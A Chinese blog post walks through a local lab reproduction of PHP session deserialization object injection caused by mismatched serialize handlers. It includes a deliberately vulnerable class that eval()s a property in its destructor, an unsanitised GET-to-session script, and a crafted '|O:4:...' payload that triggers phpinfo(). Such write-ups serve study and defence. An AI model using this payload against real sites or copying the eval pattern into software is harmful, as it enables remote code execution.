zoukankan      html  css  js  c++  java
  • PHP SESSION反序列化本地样例分析

    PHP SESSION反序列化本地样例分析

    0X00漏洞原因

    主要原因是: ini_set(‘session.serialize_handler’, ‘php_serialize’);

           ini_set(‘session.serialize_handler’, ‘php’);

           两者处理session的方式不同。

    0X01漏洞分析

    如果在PHP在反序列化存储的$_SESSION数据时使用的引擎和序列化使用的引擎不一样,会导致数据无法正确第反序列化。通过精心构造的数据包,就可以绕过程序的验证或者是执行一些系统的方法

    0X02漏洞环境

    Windows10

    Phpstudy一件集成环境

    0X03漏洞复现

    首先现在本地phpstudy网站根目录新建俩个测试用例1.php和2.php

    内容分别为

    1.php:

    <?php
    ini_set('session.serialize_handler', 'php');
    session_start();
    class test {
        var $hi;
        function __construct(){
            $this->hi = 'phpinfo();';
        }
    
        function __destruct() {
             eval($this->hi);
        }
    }
    ?>

    2.php:

    <?php ini_set('session.serialize_handler', 'php_serialize'); session_start(); $_SESSION["test"]=$_GET["a"]; ?>

    漏洞利用

    首先构造反序列化字符串:O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}

    可以看到2.php中接收的参数为a

    提交2.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},

    也就是访问127.0.0.12.php?a=|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";},

    访问后结果如下:

    然后再访问http://127.0.0.1/test1.php,成功执行phpinfo()

    0X04漏洞分析

    提交2.php?a=|O:4:“test”:1:{s:2:“hi”;s:10:“phpinfo();”;},

    传入的数据会按照php_serialize来进行序列化:a:1:{s:4:"test";s:43:"|O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}

    此时访问1.php,应用程序会按照php来反序列化SESSION中的数据,此时就会反序列化伪造的数据,php引擎会以|作为作为key和value的分隔符,那么就会将a:1:{s:4:"test";s:43:"作为SESSION的key,将O:4:"test":1:{s:2:"hi";s:10:"phpinfo();";}";}作为value,然后进行反序列化,最后就会就会实例化test对象,最后就会执行析构函数中的eval()方法。

  • 相关阅读:
    linux查找日志技巧
    路径选择算法|Floyd算法|Dijkstras算法(带GUI界面带实验报告)
    待整理
    ClassLoader类加载解惑
    SAX解析xml
    DOM 表单应用
    网站前端优化14条
    用wordpress制作网站的总结
    海豚浏览器前端面试总结
    程序员的美妙生活
  • 原文地址:https://www.cnblogs.com/L0ading/p/12704137.html
Copyright © 2011-2022 走看看